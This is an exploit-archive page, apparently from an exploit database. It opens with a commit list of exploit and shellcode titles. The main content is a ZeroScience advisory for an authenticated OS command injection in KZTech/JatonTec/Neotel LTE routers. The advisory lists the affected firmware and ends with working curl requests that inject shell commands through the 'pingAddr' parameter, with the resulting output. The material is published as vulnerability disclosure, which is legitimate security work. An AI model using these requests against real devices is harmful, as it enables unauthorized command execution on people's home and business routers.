f33a724e0b
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
83 lines
No EOL
3.3 KiB
Text
83 lines
No EOL
3.3 KiB
Text
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
|
|
# Date: 03.02.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
|
|
|
|
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
|
|
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
|
|
http://www.jatontec.com/products/show.php?itemid=258
|
|
http://www.jatontech.com/CAT12.html#_pp=105_564
|
|
http://www.kzbtech.com/AM3300V.html
|
|
https://neotel.mk/ostanati-paketi-2/
|
|
|
|
Affected version: Model | Firmware
|
|
-------|---------
|
|
JT3500V | 2.0.1B1064
|
|
JT3300V | 2.0.1B1047
|
|
AM6200M | 2.0.0B3210
|
|
AM6000N | 2.0.0B3042
|
|
AM5000W | 2.0.0B3037
|
|
AM4200M | 2.0.0B2996
|
|
AM4100V | 2.0.0B2988
|
|
AM3500MW | 2.0.0B1092
|
|
AM3410V | 2.0.0B1085
|
|
AM3300V | 2.0.0B1060
|
|
AM3100E | 2.0.0B981
|
|
AM3100V | 2.0.0B946
|
|
AM3000M | 2.0.0B21
|
|
KZ7621U | 2.0.0B14
|
|
KZ3220M | 2.0.0B04
|
|
KZ3120R | 2.0.0B01
|
|
|
|
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
|
|
& VoIP CPE product specially designed to enable quick and easy
|
|
LTE fixed data service deployment for residential and SOHO customers.
|
|
It provides high speed LAN, Wi-Fi and VoIP integrated services
|
|
to end users who need both bandwidth and multi-media data service
|
|
in residential homes or enterprises. The device has 2 Gigabit LAN
|
|
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
|
|
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
|
|
and firewall software for security. It provides an effective
|
|
all-in-one solution to SOHO or residential customers. It can
|
|
deliver up to 1Gbps max data throughput which can be very
|
|
competitive to wired broadband access service.
|
|
|
|
Desc: The application suffers from an authenticated OS command
|
|
injection vulnerability. This can be exploited to inject and
|
|
execute arbitrary shell commands through the 'pingAddr' HTTP
|
|
POST parameter bypassing the injection protection filter.
|
|
|
|
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
|
|
Linux 2.6.36+ (mips)
|
|
Mediatek APSoC SDK v4.3.1.0
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5635
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
|
|
|
|
|
|
03.02.2021
|
|
|
|
--
|
|
|
|
|
|
#JT3300V/AM3300V
|
|
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
|
|
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
|
|
-H "Cookie: kz_userid=admin:311139" \
|
|
-H "X-Requested-With: XMLHttpRequest"
|
|
ping: bad address 'Linux'
|
|
lqwrm@metalgear:~/prive$
|
|
|
|
|
|
#JT3500V
|
|
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
|
|
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
|
|
-H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
|
|
-H "X-Requested-With: XMLHttpRequest"
|
|
ping: bad address 'Linux'
|
|
lqwrm@metalgear:~/prive$ |